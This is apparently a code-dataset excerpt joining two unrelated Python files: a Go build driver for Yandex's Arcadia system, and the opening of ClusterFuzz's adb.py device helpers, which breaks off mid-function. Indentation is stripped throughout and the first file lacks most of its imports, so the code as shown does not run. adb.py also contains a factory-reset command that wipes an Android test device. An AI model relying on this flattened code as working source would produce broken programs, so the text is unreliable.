from functools import reduce
import process_command_files as pcf
arc_project_prefix = 'a.yandex-team.ru/'
std_lib_prefix = 'contrib/go/_std/src/'
vendor_prefix = 'vendor/'
vet_info_ext = '.vet.out'
vet_report_ext = '.vet.txt'
FIXED_CGO1_SUFFIX='.fixed.cgo1.go'
COMPILE_OPTIMIZATION_FLAGS=('-N',)
def get_trimpath_args(args):
return ['-trimpath', args.trimpath] if args.trimpath else []
def preprocess_cgo1(src_path, dst_path, source_root):
with open(src_path, 'r') as f:
content = f.read()
content = content.replace('__ARCADIA_SOURCE_ROOT_PREFIX__', source_root)
with open(dst_path, 'w') as f:
f.write(content)
def preprocess_args(args):
# Temporary work around for noauto
if args.cgo_srcs and len(args.cgo_srcs) > 0:
cgo_srcs_set = set(args.cgo_srcs)
args.srcs = [x for x in args.srcs if x not in cgo_srcs_set]
args.pkg_root = os.path.join(args.toolchain_root, 'pkg')
toolchain_tool_root = os.path.join(args.pkg_root, 'tool', '{}_{}'.format(args.host_os, args.host_arch))
args.go_compile = os.path.join(toolchain_tool_root, 'compile')
args.go_cgo = os.path.join(toolchain_tool_root, 'cgo')
args.go_link = os.path.join(toolchain_tool_root, 'link')
args.go_asm = os.path.join(toolchain_tool_root, 'asm')
args.go_pack = os.path.join(toolchain_tool_root, 'pack')
args.go_vet = os.path.join(toolchain_tool_root, 'vet') if args.vet is True else args.vet
args.output = os.path.normpath(args.output)
args.vet_report_output = vet_report_output_name(args.output, args.vet_report_ext)
args.trimpath = None
if args.debug_root_map:
roots = {'build': args.build_root, 'source': args.source_root, 'tools': args.tools_root}
replaces = []
for root in args.debug_root_map.split(';'):
src, dst = root.split('=', 1)
assert src in roots
replaces.append('{}=>{}'.format(roots[src], dst))
del roots[src]
assert len(replaces) > 0
args.trimpath = ';'.join(replaces)
args.build_root = os.path.normpath(args.build_root)
args.build_root_dir = args.build_root + os.path.sep
args.source_root = os.path.normpath(args.source_root)
args.source_root_dir = args.source_root + os.path.sep
args.output_root = os.path.normpath(args.output_root)
args.import_map = {}
args.module_map = {}
if args.cgo_peers:
args.cgo_peers = [x for x in args.cgo_peers if not x.endswith('.fake.pkg')]
assert args.mode == 'test' or args.test_srcs is None and args.xtest_srcs is None
# add lexical oreder by basename for go sources
args.srcs.sort(key=lambda x: os.path.basename(x))
if args.test_srcs:
args.srcs += sorted(args.test_srcs, key=lambda x: os.path.basename(x))
del args.test_srcs
if args.xtest_srcs:
args.xtest_srcs.sort(key=lambda x: os.path.basename(x))
# compute root relative module dir path
assert args.output is None or args.output_root == os.path.dirname(args.output)
assert args.output_root.startswith(args.build_root_dir)
args.module_path = args.output_root[len(args.build_root_dir):]
args.source_module_dir = os.path.join(args.source_root, args.module_path) + os.path.sep
assert len(args.module_path) > 0
args.import_path, args.is_std = get_import_path(args.module_path)
assert args.asmhdr is None or args.word == 'go'
srcs = []
for f in args.srcs:
if f.endswith(FIXED_CGO1_SUFFIX) and f.startswith(args.build_root_dir):
path = os.path.join(args.output_root, '{}.cgo1.go'.format(os.path.basename(f[:-len(FIXED_CGO1_SUFFIX)])))
srcs.append(path)
preprocess_cgo1(f, path, args.source_root)
else:
srcs.append(f)
args.srcs = srcs
classify_srcs(args.srcs, args)
def compare_versions(version1, version2):
def last_index(version):
index = version.find('beta')
return len(version) if index < 0 else index
v1 = tuple(x.zfill(8) for x in version1[:last_index(version1)].split('.'))
v2 = tuple(x.zfill(8) for x in version2[:last_index(version2)].split('.'))
if v1 == v2:
return 0
return 1 if v1 < v2 else -1
def get_symlink_or_copyfile():
os_symlink = getattr(os, 'symlink', None)
if os_symlink is None:
os_symlink = shutil.copyfile
return os_symlink
def copy_args(args):
return copy.copy(args)
def get_vendor_index(import_path):
index = import_path.rfind('/' + vendor_prefix)
if index < 0:
index = 0 if import_path.startswith(vendor_prefix) else index
else:
index = index + 1
return index
def get_import_path(module_path):
assert len(module_path) > 0
import_path = module_path.replace('\\', '/')
is_std_module = import_path.startswith(std_lib_prefix)
if is_std_module:
import_path = import_path[len(std_lib_prefix):]
elif import_path.startswith(vendor_prefix):
import_path = import_path[len(vendor_prefix):]
else:
import_path = arc_project_prefix + import_path
assert len(import_path) > 0
return import_path, is_std_module
def call(cmd, cwd, env=None):
# sys.stderr.write('{}\n'.format(' '.join(cmd)))
return subprocess.check_output(cmd, stdin=None, stderr=subprocess.STDOUT, cwd=cwd, env=env)
def classify_srcs(srcs, args):
args.go_srcs = [x for x in srcs if x.endswith('.go')]
args.asm_srcs = [x for x in srcs if x.endswith('.s')]
args.objects = [x for x in srcs if x.endswith('.o') or x.endswith('.obj')]
args.symabis = [x for x in srcs if x.endswith('.symabis')]
args.sysos = [x for x in srcs if x.endswith('.syso')]
def get_import_config_info(peers, gen_importmap, import_map={}, module_map={}):
info = {'importmap': [], 'packagefile': [], 'standard': {}}
if gen_importmap:
for key, value in six.iteritems(import_map):
info['importmap'].append((key, value))
for peer in peers:
peer_import_path, is_std = get_import_path(os.path.dirname(peer))
if gen_importmap:
index = get_vendor_index(peer_import_path)
if index >= 0:
index += len(vendor_prefix)
info['importmap'].append((peer_import_path[index:], peer_import_path))
info['packagefile'].append((peer_import_path, os.path.join(args.build_root, peer)))
if is_std:
info['standard'][peer_import_path] = True
for key, value in six.iteritems(module_map):
info['packagefile'].append((key, value))
return info
def create_import_config(peers, gen_importmap, import_map={}, module_map={}):
lines = []
info = get_import_config_info(peers, gen_importmap, import_map, module_map)
for key in ('importmap', 'packagefile'):
for item in info[key]:
lines.append('{} {}={}'.format(key, *item))
if len(lines) > 0:
lines.append('')
content = '\n'.join(lines)
# sys.stderr.writelines('{}\n'.format(l) for l in lines)
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(content)
return f.name
return None
def create_embed_config(args):
data = {
'Patterns': {},
'Files': {},
}
for info in args.embed:
pattern = info[0]
if pattern.endswith('/**/*'):
pattern = pattern[:-3]
files = {os.path.relpath(f, args.source_module_dir): f for f in info[1:]}
data['Patterns'][pattern] = list(files.keys())
data['Files'].update(files)
# sys.stderr.write('{}\n'.format(json.dumps(data, indent=4)))
with tempfile.NamedTemporaryFile(delete=False, suffix='.embedcfg') as f:
f.write(json.dumps(data))
return f.name
def vet_info_output_name(path, ext=None):
return '{}{}'.format(path, ext or vet_info_ext)
def vet_report_output_name(path, ext=None):
return '{}{}'.format(path, ext or vet_report_ext)
def get_source_path(args):
return args.test_import_path or args.module_path
def gen_vet_info(args):
import_path = args.real_import_path if hasattr(args, 'real_import_path') else args.import_path
info = get_import_config_info(args.peers, True, args.import_map, args.module_map)
import_map = dict(info['importmap'])
# FIXME(snermolaev): it seems that adding import map for 'fake' package
# does't make any harm (it needs to be revised later)
import_map['unsafe'] = 'unsafe'
for (key, _) in info['packagefile']:
if key not in import_map:
import_map[key] = key
data = {
'ID': import_path,
'Compiler': 'gc',
'Dir': os.path.join(args.source_root, get_source_path(args)),
'ImportPath': import_path,
'GoFiles': [x for x in args.go_srcs if x.endswith('.go')],
'NonGoFiles': [x for x in args.go_srcs if not x.endswith('.go')],
'ImportMap': import_map,
'PackageFile': dict(info['packagefile']),
'Standard': dict(info['standard']),
'PackageVetx': dict((key, vet_info_output_name(value)) for key, value in info['packagefile']),
'VetxOnly': False,
'VetxOutput': vet_info_output_name(args.output),
'SucceedOnTypecheckFailure': False
}
# sys.stderr.write('{}\n'.format(json.dumps(data, indent=4)))
return data
def create_vet_config(args, info):
with tempfile.NamedTemporaryFile(delete=False, suffix='.cfg') as f:
f.write(json.dumps(info))
return f.name
def decode_vet_report(json_report):
report = ''
if json_report:
try:
full_diags = json.JSONDecoder(encoding='UTF-8').decode(json_report)
except ValueError:
report = json_report
else:
messages = []
for _, module_diags in six.iteritems(full_diags):
for _, type_diags in six.iteritems(module_diags):
for diag in type_diags:
messages.append(u'{}: {}'.format(diag['posn'], diag['message']))
report = '\n'.join(sorted(messages)).encode('UTF-8')
return report
def dump_vet_report(args, report):
if report:
report = report.replace(args.build_root, '$B')
report = report.replace(args.source_root, '$S')
with open(args.vet_report_output, 'w') as f:
f.write(report)
def read_vet_report(args):
assert args
report = ''
if os.path.exists(args.vet_report_output):
with open(args.vet_report_output, 'r') as f:
report += f.read()
return report
def dump_vet_report_for_tests(args, *test_args_list):
dump_vet_report(args, reduce(lambda x, y: x + read_vet_report(y), [_f for _f in test_args_list if _f], ''))
def do_vet(args):
assert args.vet
info = gen_vet_info(args)
vet_config = create_vet_config(args, info)
cmd = [args.go_vet, '-json']
if args.vet_flags:
cmd.extend(args.vet_flags)
cmd.append(vet_config)
# sys.stderr.write('>>>> [{}]\n'.format(' '.join(cmd)))
p_vet = subprocess.Popen(cmd, stdin=None, stderr=subprocess.PIPE, stdout=subprocess.PIPE, cwd=args.source_root)
vet_out, vet_err = p_vet.communicate()
report = decode_vet_report(vet_out) if vet_out else ''
dump_vet_report(args, report)
if p_vet.returncode:
raise subprocess.CalledProcessError(returncode=p_vet.returncode, cmd=cmd, output=vet_err)
def _do_compile_go(args):
import_path, is_std_module = args.import_path, args.is_std
cmd = [
args.go_compile,
'-o',
args.output,
'-p',
import_path,
'-D',
'""',
'-goversion',
'go{}'.format(args.goversion)
]
cmd.extend(get_trimpath_args(args))
if is_std_module:
cmd.append('-std')
if import_path == 'runtime' or import_path.startswith('runtime/internal/'):
cmd.append('-+')
import_config_name = create_import_config(args.peers, True, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
else:
if import_path == 'unsafe' or len(args.objects) > 0 or args.asmhdr:
pass
else:
cmd.append('-complete')
if args.embed and compare_versions('1.16', args.goversion) >= 0:
embed_config_name = create_embed_config(args)
cmd.extend(['-embedcfg', embed_config_name])
if args.asmhdr:
cmd += ['-asmhdr', args.asmhdr]
# Use .symabis (starting from 1.12 version)
if args.symabis:
cmd += ['-symabis'] + args.symabis
# If 1.12 <= version < 1.13 we have to pass -allabis for 'runtime' and 'runtime/internal/atomic'
# if compare_versions('1.13', args.goversion) >= 0:
# pass
# elif import_path in ('runtime', 'runtime/internal/atomic'):
# cmd.append('-allabis')
compile_workers = '4'
if args.compile_flags:
if import_path == 'runtime' or import_path.startswith('runtime/'):
cmd.extend(x for x in args.compile_flags if x not in COMPILE_OPTIMIZATION_FLAGS)
else:
cmd.extend(args.compile_flags)
if any([x in ('-race', '-shared') for x in args.compile_flags]):
compile_workers = '1'
cmd += ['-pack', '-c={}'.format(compile_workers)]
cmd += args.go_srcs
call(cmd, args.build_root)
class VetThread(threading.Thread):
def __init__(self, target, args):
super(VetThread, self).__init__(target=target, args=args)
self.exc_info = None
def run(self):
try:
super(VetThread, self).run()
except:
self.exc_info = sys.exc_info()
def join_with_exception(self, reraise_exception):
self.join()
if reraise_exception and self.exc_info:
six.reraise(self.exc_info[0], self.exc_info[1], self.exc_info[2])
def do_compile_go(args):
raise_exception_from_vet = False
if args.vet:
run_vet = VetThread(target=do_vet, args=(args,))
run_vet.start()
try:
_do_compile_go(args)
raise_exception_from_vet = True
finally:
if args.vet:
run_vet.join_with_exception(raise_exception_from_vet)
def do_compile_asm(args):
def need_compiling_runtime(import_path):
return import_path in ('runtime', 'reflect', 'syscall') or import_path.startswith('runtime/internal/')
assert(len(args.srcs) == 1 and len(args.asm_srcs) == 1)
cmd = [args.go_asm]
cmd += get_trimpath_args(args)
cmd += ['-I', args.output_root, '-I', os.path.join(args.pkg_root, 'include')]
cmd += ['-D', 'GOOS_' + args.targ_os, '-D', 'GOARCH_' + args.targ_arch, '-o', args.output]
# TODO: This is just a quick fix to start work on 1.16 support
if compare_versions('1.16', args.goversion) >= 0:
cmd += ['-p', args.import_path]
if need_compiling_runtime(args.import_path):
cmd += ['-compiling-runtime']
if args.asm_flags:
cmd += args.asm_flags
cmd += args.asm_srcs
call(cmd, args.build_root)
def do_link_lib(args):
if len(args.asm_srcs) > 0:
asmargs = copy_args(args)
asmargs.asmhdr = os.path.join(asmargs.output_root, 'go_asm.h')
do_compile_go(asmargs)
for src in asmargs.asm_srcs:
asmargs.srcs = [src]
asmargs.asm_srcs = [src]
asmargs.output = os.path.join(asmargs.output_root, os.path.basename(src) + '.o')
do_compile_asm(asmargs)
args.objects.append(asmargs.output)
else:
do_compile_go(args)
if args.objects:
cmd = [args.go_pack, 'r', args.output] + args.objects + args.sysos
call(cmd, args.build_root)
def do_link_exe(args):
assert args.extld is not None
assert args.non_local_peers is not None
compile_args = copy_args(args)
compile_args.output = os.path.join(args.output_root, 'main.a')
compile_args.real_import_path = compile_args.import_path
compile_args.import_path = 'main'
if args.vcs and os.path.isfile(compile_args.vcs):
build_info = os.path.join('library', 'go', 'core', 'buildinfo')
if any([x.startswith(build_info) for x in compile_args.peers]):
compile_args.go_srcs.append(compile_args.vcs)
do_link_lib(compile_args)
cmd = [args.go_link, '-o', args.output]
import_config_name = create_import_config(args.peers + args.non_local_peers, False, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
if args.link_flags:
cmd += args.link_flags
if args.mode in ('exe', 'test'):
cmd.append('-buildmode=exe')
elif args.mode == 'dll':
cmd.append('-buildmode=c-shared')
else:
assert False, 'Unexpected mode: {}'.format(args.mode)
cmd.append('-extld={}'.format(args.extld))
extldflags = []
if args.extldflags is not None:
filter_musl = bool
if args.musl:
cmd.append('-linkmode=external')
extldflags.append('-static')
filter_musl = lambda x: not x in ('-lc', '-ldl', '-lm', '-lpthread', '-lrt')
extldflags += [x for x in args.extldflags if filter_musl(x)]
cgo_peers = []
if args.cgo_peers is not None and len(args.cgo_peers) > 0:
is_group = args.targ_os == 'linux'
if is_group:
cgo_peers.append('-Wl,--start-group')
cgo_peers.extend(args.cgo_peers)
if is_group:
cgo_peers.append('-Wl,--end-group')
try:
index = extldflags.index('--cgo-peers')
extldflags = extldflags[:index] + cgo_peers + extldflags[index+1:]
except ValueError:
extldflags.extend(cgo_peers)
if len(extldflags) > 0:
cmd.append('-extldflags={}'.format(' '.join(extldflags)))
cmd.append(compile_args.output)
call(cmd, args.build_root)
def gen_cover_info(args):
lines = []
lines.extend([
"""
var (
coverCounters = make(map[string][]uint32)
coverBlocks = make(map[string][]testing.CoverBlock)
)
""",
'func init() {',
])
for var, file in (x.split(':') for x in args.cover_info):
lines.append(' coverRegisterFile("{file}", _cover0.{var}.Count[:], _cover0.{var}.Pos[:], _cover0.{var}.NumStmt[:])'.format(file=file, var=var))
lines.extend([
'}',
"""
func coverRegisterFile(fileName string, counter []uint32, pos []uint32, numStmts []uint16) {
if 3*len(counter) != len(pos) || len(counter) != len(numStmts) {
panic("coverage: mismatched sizes")
}
if coverCounters[fileName] != nil {
// Already registered.
return
}
coverCounters[fileName] = counter
block := make([]testing.CoverBlock, len(counter))
for i := range counter {
block[i] = testing.CoverBlock{
Line0: pos[3*i+0],
Col0: uint16(pos[3*i+2]),
Line1: pos[3*i+1],
Col1: uint16(pos[3*i+2]>>16),
Stmts: numStmts[i],
}
}
coverBlocks[fileName] = block
}
""",
])
return lines
def filter_out_skip_tests(tests, skip_tests):
skip_set = set()
star_skip_set = set()
for t in skip_tests:
work_set = star_skip_set if '*' in t else skip_set
work_set.add(t)
re_star_tests = None
if len(star_skip_set) > 0:
re_star_tests = re.compile(re.sub(r'(\*)+', r'.\1', '^({})$'.format('|'.join(star_skip_set))))
return [x for x in tests if not (x in skip_tests or re_star_tests and re_star_tests.match(x))]
def gen_test_main(args, test_lib_args, xtest_lib_args):
assert args and (test_lib_args or xtest_lib_args)
test_miner = args.test_miner
test_module_path = test_lib_args.import_path if test_lib_args else xtest_lib_args.import_path
is_cover = args.cover_info and len(args.cover_info) > 0
# Prepare GOPATH
# $BINDIR
# |- __go__
# |- src
# |- pkg
# |- ${TARGET_OS}_${TARGET_ARCH}
go_path_root = os.path.join(args.output_root, '__go__')
test_src_dir = os.path.join(go_path_root, 'src')
target_os_arch = '_'.join([args.targ_os, args.targ_arch])
test_pkg_dir = os.path.join(go_path_root, 'pkg', target_os_arch, os.path.dirname(test_module_path))
os.makedirs(test_pkg_dir)
my_env = os.environ.copy()
my_env['GOROOT'] = ''
my_env['GOPATH'] = go_path_root
my_env['GOARCH'] = args.targ_arch
my_env['GOOS'] = args.targ_os
tests = []
xtests = []
os_symlink = get_symlink_or_copyfile()
# Get the list of "internal" tests
if test_lib_args:
os.makedirs(os.path.join(test_src_dir, test_module_path))
os_symlink(test_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(test_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', test_module_path]
tests = [x for x in (call(cmd, test_lib_args.output_root, my_env) or '').strip().split('\n') if len(x) > 0]
if args.skip_tests:
tests = filter_out_skip_tests(tests, args.skip_tests)
test_main_found = '#TestMain' in tests
# Get the list of "external" tests
if xtest_lib_args:
xtest_module_path = xtest_lib_args.import_path
os.makedirs(os.path.join(test_src_dir, xtest_module_path))
os_symlink(xtest_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(xtest_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', xtest_module_path]
xtests = [x for x in (call(cmd, xtest_lib_args.output_root, my_env) or '').strip().split('\n') if len(x) > 0]
if args.skip_tests:
xtests = filter_out_skip_tests(xtests, args.skip_tests)
xtest_main_found = '#TestMain' in xtests
test_main_package = None
if test_main_found and xtest_main_found:
assert False, 'multiple definition of TestMain'
elif test_main_found:
test_main_package = '_test'
elif xtest_main_found:
test_main_package = '_xtest'
shutil.rmtree(go_path_root)
lines = ['package main', '', 'import (']
if test_main_package is None:
lines.append(' "os"')
lines.extend([' "testing"', ' "testing/internal/testdeps"'])
if len(tests) > 0:
lines.append(' _test "{}"'.format(test_module_path))
elif test_lib_args:
lines.append(' _ "{}"'.format(test_module_path))
if len(xtests) > 0:
lines.append(' _xtest "{}"'.format(xtest_module_path))
elif xtest_lib_args:
lines.append(' _ "{}"'.format(xtest_module_path))
if is_cover:
lines.append(' _cover0 "{}"'.format(test_module_path))
lines.extend([')', ''])
for kind in ['Test', 'Benchmark', 'Example']:
lines.append('var {}s = []testing.Internal{}{{'.format(kind.lower(), kind))
for test in [x for x in tests if x.startswith(kind)]:
lines.append(' {{"{test}", _test.{test}}},'.format(test=test))
for test in [x for x in xtests if x.startswith(kind)]:
lines.append(' {{"{test}", _xtest.{test}}},'.format(test=test))
lines.extend(['}', ''])
if is_cover:
lines.extend(gen_cover_info(args))
lines.append('func main() {')
if is_cover:
lines.extend([
' testing.RegisterCover(testing.Cover{',
' Mode: "set",',
' Counters: coverCounters,',
' Blocks: coverBlocks,',
' CoveredPackages: "",',
' })',
])
lines.extend([
' m := testing.MainStart(testdeps.TestDeps{}, tests, benchmarks, examples)'
'',
])
if test_main_package:
lines.append(' {}.TestMain(m)'.format(test_main_package))
else:
lines.append(' os.Exit(m.Run())')
lines.extend(['}', ''])
content = '\n'.join(lines)
# sys.stderr.write('{}\n'.format(content))
return content
def do_link_test(args):
assert args.srcs or args.xtest_srcs
assert args.test_miner is not None
test_module_path = get_source_path(args)
test_import_path, _ = get_import_path(test_module_path)
test_lib_args = copy_args(args) if args.srcs else None
xtest_lib_args = copy_args(args) if args.xtest_srcs else None
if xtest_lib_args is not None:
xtest_lib_args.embed = args.embed_xtest if args.embed_xtest else None
ydx_file_name = None
xtest_ydx_file_name = None
need_append_ydx = test_lib_args and xtest_lib_args and args.ydx_file and args.vet_flags
if need_append_ydx:
def find_ydx_file_name(name, flags):
for i, elem in enumerate(flags):
if elem.endswith(name):
return (i, elem)
assert False, 'Unreachable code'
idx, ydx_file_name = find_ydx_file_name(xtest_lib_args.ydx_file, xtest_lib_args.vet_flags)
xtest_ydx_file_name = '{}_xtest'.format(ydx_file_name)
xtest_lib_args.vet_flags = copy.copy(xtest_lib_args.vet_flags)
xtest_lib_args.vet_flags[idx] = xtest_ydx_file_name
if test_lib_args:
test_lib_args.output = os.path.join(args.output_root, 'test.a')
test_lib_args.vet_report_output = vet_report_output_name(test_lib_args.output)
test_lib_args.module_path = test_module_path
test_lib_args.import_path = test_import_path
do_link_lib(test_lib_args)
if xtest_lib_args:
xtest_lib_args.srcs = xtest_lib_args.xtest_srcs
classify_srcs(xtest_lib_args.srcs, xtest_lib_args)
xtest_lib_args.output = os.path.join(args.output_root, 'xtest.a')
xtest_lib_args.vet_report_output = vet_report_output_name(xtest_lib_args.output)
xtest_lib_args.module_path = test_module_path + '_test'
xtest_lib_args.import_path = test_import_path + '_test'
if test_lib_args:
xtest_lib_args.module_map[test_import_path] = test_lib_args.output
need_append_ydx = args.ydx_file and args.srcs and args.vet_flags
do_link_lib(xtest_lib_args)
if need_append_ydx:
with open(os.path.join(args.build_root, ydx_file_name), 'ab') as dst_file:
with open(os.path.join(args.build_root, xtest_ydx_file_name), 'rb') as src_file:
dst_file.write(src_file.read())
test_main_content = gen_test_main(args, test_lib_args, xtest_lib_args)
test_main_name = os.path.join(args.output_root, '_test_main.go')
with open(test_main_name, "w") as f:
f.write(test_main_content)
test_args = copy_args(args)
test_args.embed = None
test_args.srcs = [test_main_name]
if test_args.test_import_path is None:
# it seems that we can do it unconditionally, but this kind
# of mangling doesn't really looks good to me and we leave it
# for pure GO_TEST module
test_args.module_path = test_args.module_path + '___test_main__'
test_args.import_path = test_args.import_path + '___test_main__'
classify_srcs(test_args.srcs, test_args)
if test_lib_args:
test_args.module_map[test_lib_args.import_path] = test_lib_args.output
if xtest_lib_args:
test_args.module_map[xtest_lib_args.import_path] = xtest_lib_args.output
if args.vet:
dump_vet_report_for_tests(test_args, test_lib_args, xtest_lib_args)
test_args.vet = False
do_link_exe(test_args)
if __name__ == '__main__':
args = pcf.get_args(sys.argv[1:])
parser = argparse.ArgumentParser(prefix_chars='+')
parser.add_argument('++mode', choices=['dll', 'exe', 'lib', 'test'], required=True)
parser.add_argument('++srcs', nargs='*', required=True)
parser.add_argument('++cgo-srcs', nargs='*')
parser.add_argument('++test_srcs', nargs='*')
parser.add_argument('++xtest_srcs', nargs='*')
parser.add_argument('++cover_info', nargs='*')
parser.add_argument('++output', nargs='?', default=None)
parser.add_argument('++source-root', default=None)
parser.add_argument('++build-root', required=True)
parser.add_argument('++tools-root', default=None)
parser.add_argument('++output-root', required=True)
parser.add_argument('++toolchain-root', required=True)
parser.add_argument('++host-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++host-arch', choices=['amd64'], required=True)
parser.add_argument('++targ-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++targ-arch', choices=['amd64', 'x86'], required=True)
parser.add_argument('++peers', nargs='*')
parser.add_argument('++non-local-peers', nargs='*')
parser.add_argument('++cgo-peers', nargs='*')
parser.add_argument('++asmhdr', nargs='?', default=None)
parser.add_argument('++test-import-path', nargs='?')
parser.add_argument('++test-miner', nargs='?')
parser.add_argument('++arc-project-prefix', nargs='?', default=arc_project_prefix)
parser.add_argument('++std-lib-prefix', nargs='?', default=std_lib_prefix)
parser.add_argument('++vendor-prefix', nargs='?', default=vendor_prefix)
parser.add_argument('++extld', nargs='?', default=None)
parser.add_argument('++extldflags', nargs='+', default=None)
parser.add_argument('++goversion', required=True)
parser.add_argument('++asm-flags', nargs='*')
parser.add_argument('++compile-flags', nargs='*')
parser.add_argument('++link-flags', nargs='*')
parser.add_argument('++vcs', nargs='?', default=None)
parser.add_argument('++vet', nargs='?', const=True, default=False)
parser.add_argument('++vet-flags', nargs='*', default=None)
parser.add_argument('++vet-info-ext', default=vet_info_ext)
parser.add_argument('++vet-report-ext', default=vet_report_ext)
parser.add_argument('++musl', action='store_true')
parser.add_argument('++skip-tests', nargs='*', default=None)
parser.add_argument('++ydx-file', default='')
parser.add_argument('++debug-root-map', default=None)
parser.add_argument('++embed', action='append', nargs='*')
parser.add_argument('++embed_xtest', action='append', nargs='*')
args = parser.parse_args(args)
arc_project_prefix = args.arc_project_prefix
std_lib_prefix = args.std_lib_prefix
vendor_prefix = args.vendor_prefix
vet_info_ext = args.vet_info_ext
vet_report_ext = args.vet_report_ext
preprocess_args(args)
try:
os.unlink(args.output)
except OSError:
pass
# We are going to support only 'lib', 'exe' and 'cgo' build modes currently
# and as a result we are going to generate only one build node per module
# (or program)
dispatch = {
'exe': do_link_exe,
'dll': do_link_exe,
'lib': do_link_lib,
'test': do_link_test
}
exit_code = 1
try:
dispatch[args.mode](args)
exit_code = 0
except KeyError:
sys.stderr.write('Unknown build mode [{}]...\n'.format(args.mode))
except subprocess.CalledProcessError as e:
sys.stderr.write('{} returned non-zero exit code {}.\n{}\n'.format(' '.join(e.cmd), e.returncode, e.output))
exit_code = e.returncode
except Exception as e:
sys.stderr.write('Unhandled exception [{}]...\n'.format(str(e)))
sys.exit(exit_code)
|
adb.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ADB shell related functions."""
import collections
import glob
import os
import re
import signal
import subprocess
import tempfile
import threading
import time
from base import persistent_cache
from base import utils
from metrics import logs
from system import environment
from system import shell
ADB_TIMEOUT = 1200 # Should be lower than |REBOOT_TIMEOUT|.
BAD_STATE_WAIT = 900
BOOT_WAIT_INTERVAL = 30
DEFAULT_DEVICE_MEMORY_MB = 2048
DEVICE = collections.namedtuple('Device', ['serial', 'path'])
DEVICE_HANG_STRING = None
DEVICE_NOT_FOUND_STRING = 'error: device \'{serial}\' not found'
DEVICE_OFFLINE_STRING = 'error: device offline'
FACTORY_RESET_WAIT = 60
KERNEL_LOG_FILES = [
'/proc/last_kmsg',
'/sys/fs/pstore/console-ramoops',
]
MONKEY_PROCESS_NAME = 'monkey'
REBOOT_TIMEOUT = 3600
RECOVERY_CMD_TIMEOUT = 60
STOP_CVD_WAIT = 20
# Output patterns to parse "lsusb" output.
LSUSB_BUS_RE = re.compile(r'Bus\s+(\d+)\s+Device\s+(\d+):.*')
LSUSB_SERIAL_RE = re.compile(r'\s+iSerial\s+\d\s+(.*)')
# This is a constant value defined in usbdevice_fs.h in Linux system.
USBDEVFS_RESET = ord('U') << 8 | 20
def bad_state_reached():
"""Wait when device is in a bad state and exit."""
persistent_cache.clear_values()
logs.log_fatal_and_exit(
'Device in bad state.', wait_before_exit=BAD_STATE_WAIT)
def copy_local_directory_to_remote(local_directory, remote_directory):
"""Copies local directory contents to a device directory."""
create_directory_if_needed(remote_directory)
if os.listdir(local_directory):
run_command(['push', '%s/.' % local_directory, remote_directory])
def copy_local_file_to_remote(local_file_path, remote_file_path):
"""Copies local file to a device file."""
create_directory_if_needed(os.path.dirname(remote_file_path))
run_command(['push', local_file_path, remote_file_path])
def copy_remote_directory_to_local(remote_directory, local_directory):
"""Copies local directory contents to a device directory."""
run_command(['pull', '%s/.' % remote_directory, local_directory])
def copy_remote_file_to_local(remote_file_path, local_file_path):
"""Copies device file to a local file."""
shell.create_directory(
os.path.dirname(local_file_path), create_intermediates=True)
run_command(['pull', remote_file_path, local_file_path])
def create_directory_if_needed(device_directory):
"""Creates a directory on the device if it doesn't already exist."""
run_shell_command(['mkdir', '-p', device_directory])
def directory_exists(directory_path):
"""Return whether a directory exists or not."""
expected = '0'
result = run_shell_command(
'\'test -d "%s"; echo $?\'' % directory_path, log_error=False)
return result == expected
def execute_command(cmd, timeout=None, log_error=True):
"""Spawns a subprocess to run the given shell command."""
so = []
# pylint: disable=consider-using-with
output_dest = tempfile.TemporaryFile()
# pylint: disable=subprocess-popen-preexec-fn,consider-using-with
pipe = subprocess.Popen(
cmd,
executable='/bin/bash',
stdout=output_dest,
stderr=subprocess.STDOUT,
shell=True,
preexec_fn=lambda: signal.signal(signal.SIGPIPE, signal.SIG_DFL),
bufsize=0)
def run():
"""Thread target function that waits for subprocess to complete."""
try:
pipe.communicate()
output_dest.seek(0)
output = output_dest.read()
output_dest.close()
if output:
so.append(output)
except OSError as _:
logs.log_warn('Failed to retrieve stdout from: %s' % cmd)
if pipe.returncode:
if log_error:
logs.log_warn(
'%s returned %d error code.' % (cmd, pipe.returncode),
output=output)
thread = threading.Thread(target=run)
thread.start()
thread.join(timeout)
if thread.is_alive():
try:
pipe.kill()
except OSError:
# Can't kill a dead process.
pass
return None
bytes_output = b''.join(so)
return bytes_output.strip().decode('utf-8', errors='ignore')
def factory_reset():
"""Reset device to factory state."""
if is_gce() or environment.is_android_emulator():
# We cannot recover from this since there can be cases like userdata image
# corruption in /data/data. Till the bug is fixed, we just need to wait
# for reimage in next iteration.
bad_state_reached()
# A device can be stuck in a boot loop due to a bad clang library update.
# Reverting that can bring a device back to good state.
revert_asan_device_setup_if_needed()
run_as_root()
run_shell_command([
'am', 'broadcast', '-a', 'android.intent.action.MASTER_CLEAR', '-n',
'android/com.android.server.MasterClearReceiver'
])
# Wait until the reset is complete.
time.sleep(FACTORY_RESET_WAIT)
def file_exists(file_path):
"""Return whether a file exists or not."""
expected = '0'
result = run_shell_command(
'\'test -f "%s"; echo $?\'' % file_path, log_error=False)
return result == expected
def get_adb_command_line(adb_cmd):
"""Return adb command line for running an adb command."""
device_serial = environment.get_value('ANDROID_SERIAL')
adb_cmd_line = '%s -s %s %s' % (get_adb_path(), device_serial, adb_cmd)
return adb_cmd_line
def get_adb_path():
"""Return path to ADB binary."""
adb_path = environment.get_value('ADB')
if adb_path:
return adb_path
return os.path.join(environment.get_platform_resources_directory(), 'adb')
def get_device_state():
"""Return the device status."""
state_cmd = get_adb_command_line('get-state')
return execute_command(state_cmd, timeout=RECOVERY_CMD_TIMEOUT)
def get_fastboot_command_line(fastboot_cmd):
